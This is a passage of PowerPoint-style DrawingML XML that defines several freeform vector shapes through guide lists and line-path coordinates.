                      <a:pt x="360" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="362" y="271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="365" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="371" y="270"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="377" y="269"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="387" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="395" y="268"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="272"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="279"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="469" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="492" y="301"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="512" y="307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="527" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="534" y="313"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="543" y="311"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="309"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="610" y="302"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="636" y="299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="659" y="296"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="676" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="684" y="2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169" name="Freeform 96"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="489" y="2493"/>
                <a:ext cx="34" cy="21"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 105"/>
                  <a:gd name="T1" fmla="*/ 0 h 61"/>
                  <a:gd name="T2" fmla="*/ 0 w 105"/>
                  <a:gd name="T3" fmla="*/ 0 h 61"/>
                  <a:gd name="T4" fmla="*/ 0 w 105"/>
                  <a:gd name="T5" fmla="*/ 0 h 61"/>
                  <a:gd name="T6" fmla="*/ 0 w 105"/>
                  <a:gd name="T7" fmla="*/ 0 h 61"/>
                  <a:gd name="T8" fmla="*/ 0 w 105"/>
                  <a:gd name="T9" fmla="*/ 0 h 61"/>
                  <a:gd name="T10" fmla="*/ 0 w 105"/>
                  <a:gd name="T11" fmla="*/ 0 h 61"/>
                  <a:gd name="T12" fmla="*/ 0 w 105"/>
                  <a:gd name="T13" fmla="*/ 0 h 61"/>
                  <a:gd name="T14" fmla="*/ 0 w 105"/>
                  <a:gd name="T15" fmla="*/ 0 h 61"/>
                  <a:gd name="T16" fmla="*/ 0 w 105"/>
                  <a:gd name="T17" fmla="*/ 0 h 61"/>
                  <a:gd name="T18" fmla="*/ 0 w 105"/>
                  <a:gd name="T19" fmla="*/ 0 h 61"/>
                  <a:gd name="T20" fmla="*/ 0 w 105"/>
                  <a:gd name="T21" fmla="*/ 0 h 61"/>
                  <a:gd name="T22" fmla="*/ 0 w 105"/>
                  <a:gd name="T23" fmla="*/ 0 h 61"/>
                  <a:gd name="T24" fmla="*/ 0 w 105"/>
                  <a:gd name="T25" fmla="*/ 0 h 61"/>
                  <a:gd name="T26" fmla="*/ 0 w 105"/>
                  <a:gd name="T27" fmla="*/ 0 h 61"/>
                  <a:gd name="T28" fmla="*/ 0 w 105"/>
                  <a:gd name="T29" fmla="*/ 0 h 61"/>
                  <a:gd name="T30" fmla="*/ 0 w 105"/>
                  <a:gd name="T31" fmla="*/ 0 h 61"/>
                  <a:gd name="T32" fmla="*/ 0 w 105"/>
                  <a:gd name="T33" fmla="*/ 0 h 61"/>
                  <a:gd name="T34" fmla="*/ 0 w 105"/>
                  <a:gd name="T35" fmla="*/ 0 h 61"/>
                  <a:gd name="T36" fmla="*/ 0 w 105"/>
                  <a:gd name="T37" fmla="*/ 0 h 61"/>
                  <a:gd name="T38" fmla="*/ 0 w 105"/>
                  <a:gd name="T39" fmla="*/ 0 h 61"/>
                  <a:gd name="T40" fmla="*/ 0 w 105"/>
                  <a:gd name="T41" fmla="*/ 0 h 61"/>
                  <a:gd name="T42" fmla="*/ 0 w 105"/>
                  <a:gd name="T43" fmla="*/ 0 h 61"/>
                  <a:gd name="T44" fmla="*/ 0 w 105"/>
                  <a:gd name="T45" fmla="*/ 0 h 61"/>
                  <a:gd name="T46" fmla="*/ 0 w 105"/>
                  <a:gd name="T47" fmla="*/ 0 h 61"/>
                  <a:gd name="T48" fmla="*/ 0 w 105"/>
                  <a:gd name="T49" fmla="*/ 0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5"/>
                  <a:gd name="T76" fmla="*/ 0 h 61"/>
                  <a:gd name="T77" fmla="*/ 105 w 105"/>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5" h="61">
                    <a:moveTo>
                      <a:pt x="1" y="55"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="7" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>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170" name="Freeform 97"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="523" y="2483"/>
                <a:ext cx="10" cy="12"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 33"/>
                  <a:gd name="T1" fmla="*/ 0 h 37"/>
                  <a:gd name="T2" fmla="*/ 0 w 33"/>
                  <a:gd name="T3" fmla="*/ 0 h 37"/>
                  <a:gd name="T4" fmla="*/ 0 w 33"/>
                  <a:gd name="T5" fmla="*/ 0 h 37"/>
                  <a:gd name="T6" fmla="*/ 0 w 33"/>
                  <a:gd name="T7" fmla="*/ 0 h 37"/>
                  <a:gd name="T8" fmla="*/ 0 w 33"/>
                  <a:gd name="T9" fmla="*/ 0 h 37"/>
                  <a:gd name="T10" fmla="*/ 0 w 33"/>
                  <a:gd name="T11" fmla="*/ 0 h 37"/>
                  <a:gd name="T12" fmla="*/ 0 w 33"/>
                  <a:gd name="T13" fmla="*/ 0 h 37"/>
                  <a:gd name="T14" fmla="*/ 0 w 33"/>
                  <a:gd name="T15" fmla="*/ 0 h 37"/>
                  <a:gd name="T16" fmla="*/ 0 w 33"/>
                  <a:gd name="T17" fmla="*/ 0 h 37"/>
                  <a:gd name="T18" fmla="*/ 0 w 33"/>
                  <a:gd name="T19" fmla="*/ 0 h 37"/>
                  <a:gd name="T20" fmla="*/ 0 w 33"/>
                  <a:gd name="T21" fmla="*/ 0 h 37"/>
                  <a:gd name="T22" fmla="*/ 0 w 33"/>
                  <a:gd name="T23" fmla="*/ 0 h 37"/>
                  <a:gd name="T24" fmla="*/ 0 w 33"/>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37"/>
                  <a:gd name="T41" fmla="*/ 33 w 33"/>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37">
                    <a:moveTo>
                      <a:pt x="0" y="28"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="6" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>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171" name="Freeform 98"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="566" y="2421"/>
                <a:ext cx="38" cy="37"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 115"/>
                  <a:gd name="T1" fmla="*/ 0 h 115"/>
                  <a:gd name="T2" fmla="*/ 0 w 115"/>
                  <a:gd name="T3" fmla="*/ 0 h 115"/>
                  <a:gd name="T4" fmla="*/ 0 w 115"/>
                  <a:gd name="T5" fmla="*/ 0 h 115"/>
                  <a:gd name="T6" fmla="*/ 0 w 115"/>
                  <a:gd name="T7" fmla="*/ 0 h 115"/>
                  <a:gd name="T8" fmla="*/ 0 w 115"/>
                  <a:gd name="T9" fmla="*/ 0 h 115"/>
                  <a:gd name="T10" fmla="*/ 0 w 115"/>
                  <a:gd name="T11" fmla="*/ 0 h 115"/>
                  <a:gd name="T12" fmla="*/ 0 w 115"/>
                  <a:gd name="T13" fmla="*/ 0 h 115"/>
                  <a:gd name="T14" fmla="*/ 0 w 115"/>
                  <a:gd name="T15" fmla="*/ 0 h 115"/>
                  <a:gd name="T16" fmla="*/ 0 w 115"/>
                  <a:gd name="T17" fmla="*/ 0 h 115"/>
                  <a:gd name="T18" fmla="*/ 0 w 115"/>
                  <a:gd name="T19" fmla="*/ 0 h 115"/>
                  <a:gd name="T20" fmla="*/ 0 w 115"/>
                  <a:gd name="T21" fmla="*/ 0 h 115"/>
                  <a:gd name="T22" fmla="*/ 0 w 115"/>
                  <a:gd name="T23" fmla="*/ 0 h 115"/>
                  <a:gd name="T24" fmla="*/ 0 w 115"/>
                  <a:gd name="T25" fmla="*/ 0 h 115"/>
                  <a:gd name="T26" fmla="*/ 0 w 115"/>
                  <a:gd name="T27" fmla="*/ 0 h 115"/>
                  <a:gd name="T28" fmla="*/ 0 w 115"/>
                  <a:gd name="T29" fmla="*/ 0 h 115"/>
                  <a:gd name="T30" fmla="*/ 0 w 115"/>
                  <a:gd name="T31" fmla="*/ 0 h 115"/>
                  <a:gd name="T32" fmla="*/ 0 w 115"/>
                  <a:gd name="T33" fmla="*/ 0 h 115"/>
                  <a:gd name="T34" fmla="*/ 0 w 115"/>
                  <a:gd name="T35" fmla="*/ 0 h 115"/>
                  <a:gd name="T36" fmla="*/ 0 w 115"/>
                  <a:gd name="T37" fmla="*/ 0 h 115"/>
                  <a:gd name="T38" fmla="*/ 0 w 115"/>
                  <a:gd name="T39" fmla="*/ 0 h 115"/>
                  <a:gd name="T40" fmla="*/ 0 w 115"/>
                  <a:gd name="T41" fmla="*/ 0 h 115"/>
                  <a:gd name="T42" fmla="*/ 0 w 115"/>
                  <a:gd name="T43" fmla="*/ 0 h 115"/>
                  <a:gd name="T44" fmla="*/ 0 w 115"/>
                  <a:gd name="T45" fmla="*/ 0 h 115"/>
                  <a:gd name="T46" fmla="*/ 0 w 115"/>
                  <a:gd name="T47" fmla="*/ 0 h 115"/>
                  <a:gd name="T48" fmla="*/ 0 w 115"/>
                  <a:gd name="T49" fmla="*/ 0 h 115"/>
                  <a:gd name="T50" fmla="*/ 0 w 115"/>
                  <a:gd name="T51" fmla="*/ 0 h 115"/>
                  <a:gd name="T52" fmla="*/ 0 w 115"/>
                  <a:gd name="T53" fmla="*/ 0 h 115"/>
                  <a:gd name="T54" fmla="*/ 0 w 115"/>
                  <a:gd name="T55" fmla="*/ 0 h 115"/>
                  <a:gd name="T56" fmla="*/ 0 w 115"/>
                  <a:gd name="T57" fmla="*/ 0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
                  <a:gd name="T88" fmla="*/ 0 h 115"/>
                  <a:gd name="T89" fmla="*/ 115 w 11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 h="115">
                    <a:moveTo>
                      <a:pt x="0" y="110"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="103"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="75"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="103" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="66"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="52" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="88"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="113"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11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172" name="Freeform 99"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="609" y="2378"/>
                <a:ext cx="73" cy="34"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 224"/>
                  <a:gd name="T1" fmla="*/ 0 h 102"/>
                  <a:gd name="T2" fmla="*/ 0 w 224"/>
                  <a:gd name="T3" fmla="*/ 0 h 102"/>
                  <a:gd name="T4" fmla="*/ 0 w 224"/>
                  <a:gd name="T5" fmla="*/ 0 h 102"/>
                  <a:gd name="T6" fmla="*/ 0 w 224"/>
                  <a:gd name="T7" fmla="*/ 0 h 102"/>
                  <a:gd name="T8" fmla="*/ 0 w 224"/>
                  <a:gd name="T9" fmla="*/ 0 h 102"/>
                  <a:gd name="T10" fmla="*/ 0 w 224"/>
                  <a:gd name="T11" fmla="*/ 0 h 102"/>
                  <a:gd name="T12" fmla="*/ 0 w 224"/>
                  <a:gd name="T13" fmla="*/ 0 h 102"/>
                  <a:gd name="T14" fmla="*/ 0 w 224"/>
                  <a:gd name="T15" fmla="*/ 0 h 102"/>
                  <a:gd name="T16" fmla="*/ 0 w 224"/>
                  <a:gd name="T17" fmla="*/ 0 h 102"/>
                  <a:gd name="T18" fmla="*/ 0 w 224"/>
                  <a:gd name="T19" fmla="*/ 0 h 102"/>
                  <a:gd name="T20" fmla="*/ 0 w 224"/>
                  <a:gd name="T21" fmla="*/ 0 h 102"/>
                  <a:gd name="T22" fmla="*/ 0 w 224"/>
                  <a:gd name="T23" fmla="*/ 0 h 102"/>
                  <a:gd name="T24" fmla="*/ 0 w 224"/>
                  <a:gd name="T25" fmla="*/ 0 h 102"/>
                  <a:gd name="T26" fmla="*/ 0 w 224"/>
                  <a:gd name="T27" fmla="*/ 0 h 102"/>
                  <a:gd name="T28" fmla="*/ 0 w 224"/>
                  <a:gd name="T29" fmla="*/ 0 h 102"/>
                  <a:gd name="T30" fmla="*/ 0 w 224"/>
                  <a:gd name="T31" fmla="*/ 0 h 102"/>
                  <a:gd name="T32" fmla="*/ 0 w 224"/>
                  <a:gd name="T33" fmla="*/ 0 h 102"/>
                  <a:gd name="T34" fmla="*/ 0 w 224"/>
                  <a:gd name="T35" fmla="*/ 0 h 102"/>
                  <a:gd name="T36" fmla="*/ 0 w 224"/>
                  <a:gd name="T37" fmla="*/ 0 h 102"/>
                  <a:gd name="T38" fmla="*/ 0 w 224"/>
                  <a:gd name="T39" fmla="*/ 0 h 102"/>
                  <a:gd name="T40" fmla="*/ 0 w 224"/>
                  <a:gd name="T41" fmla="*/ 0 h 102"/>
                  <a:gd name="T42" fmla="*/ 0 w 224"/>
                  <a:gd name="T43" fmla="*/ 0 h 102"/>
                  <a:gd name="T44" fmla="*/ 0 w 224"/>
                  <a:gd name="T45" fmla="*/ 0 h 102"/>
                  <a:gd name="T46" fmla="*/ 0 w 224"/>
                  <a:gd name="T47" fmla="*/ 0 h 102"/>
                  <a:gd name="T48" fmla="*/ 0 w 224"/>
                  <a:gd name="T49" fmla="*/ 0 h 102"/>
                  <a:gd name="T50" fmla="*/ 0 w 224"/>
                  <a:gd name="T51" fmla="*/ 0 h 102"/>
                  <a:gd name="T52" fmla="*/ 0 w 224"/>
                  <a:gd name="T53" fmla="*/ 0 h 102"/>
                  <a:gd name="T54" fmla="*/ 0 w 224"/>
                  <a:gd name="T55" fmla="*/ 0 h 102"/>
                  <a:gd name="T56" fmla="*/ 0 w 224"/>
                  <a:gd name="T57" fmla="*/ 0 h 102"/>
                  <a:gd name="T58" fmla="*/ 0 w 224"/>
                  <a:gd name="T59" fmla="*/ 0 h 102"/>
                  <a:gd name="T60" fmla="*/ 0 w 224"/>
                  <a:gd name="T61" fmla="*/ 0 h 102"/>
                  <a:gd name="T62" fmla="*/ 0 w 224"/>
                  <a:gd name="T63" fmla="*/ 0 h 102"/>
                  <a:gd name="T64" fmla="*/ 0 w 224"/>
                  <a:gd name="T65" fmla="*/ 0 h 102"/>
                  <a:gd name="T66" fmla="*/ 0 w 224"/>
                  <a:gd name="T67" fmla="*/ 0 h 102"/>
                  <a:gd name="T68" fmla="*/ 0 w 224"/>
                  <a:gd name="T69" fmla="*/ 0 h 102"/>
                  <a:gd name="T70" fmla="*/ 0 w 224"/>
                  <a:gd name="T71" fmla="*/ 0 h 102"/>
                  <a:gd name="T72" fmla="*/ 0 w 224"/>
                  <a:gd name="T73" fmla="*/ 0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4"/>
                  <a:gd name="T112" fmla="*/ 0 h 102"/>
                  <a:gd name="T113" fmla="*/ 224 w 224"/>
                  <a:gd name="T114" fmla="*/ 102 h 10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4" h="102">
                    <a:moveTo>
                      <a:pt x="0" y="102"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="177" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="186" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="204" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="198" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="127" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="90"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>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173" name="Freeform 100"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="685" y="2375"/>
                <a:ext cx="14" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 44"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 44"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 44"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 44"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 44"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 44"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 44"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 44"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 44"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 44"/>
                  <a:gd name="T25" fmla="*/ 0 h 28"/>
                  <a:gd name="T26" fmla="*/ 0 w 44"/>
                  <a:gd name="T27" fmla="*/ 0 h 28"/>
                  <a:gd name="T28" fmla="*/ 0 w 44"/>
                  <a:gd name="T29" fmla="*/ 0 h 28"/>
                  <a:gd name="T30" fmla="*/ 0 w 44"/>
                  <a:gd name="T31" fmla="*/ 0 h 28"/>
                  <a:gd name="T32" fmla="*/ 0 w 44"/>
                  <a:gd name="T33" fmla="*/ 0 h 28"/>
                  <a:gd name="T34" fmla="*/ 0 w 44"/>
                  <a:gd name="T35" fmla="*/ 0 h 28"/>
                  <a:gd name="T36" fmla="*/ 0 w 44"/>
                  <a:gd name="T37" fmla="*/ 0 h 28"/>
                  <a:gd name="T38" fmla="*/ 0 w 44"/>
                  <a:gd name="T39" fmla="*/ 0 h 28"/>
                  <a:gd name="T40" fmla="*/ 0 w 44"/>
                  <a:gd name="T41" fmla="*/ 0 h 28"/>
                  <a:gd name="T42" fmla="*/ 0 w 44"/>
                  <a:gd name="T43" fmla="*/ 0 h 28"/>
                  <a:gd name="T44" fmla="*/ 0 w 44"/>
                  <a:gd name="T45" fmla="*/ 0 h 28"/>
                  <a:gd name="T46" fmla="*/ 0 w 44"/>
                  <a:gd name="T47" fmla="*/ 0 h 28"/>
                  <a:gd name="T48" fmla="*/ 0 w 44"/>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28"/>
                  <a:gd name="T77" fmla="*/ 44 w 44"/>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28">
                    <a:moveTo>
                      <a:pt x="1" y="6"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="4" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="44" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="6"/>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174" name="Freeform 101"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="731" y="2487"/>
                <a:ext cx="11" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 34"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 34"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 34"/>
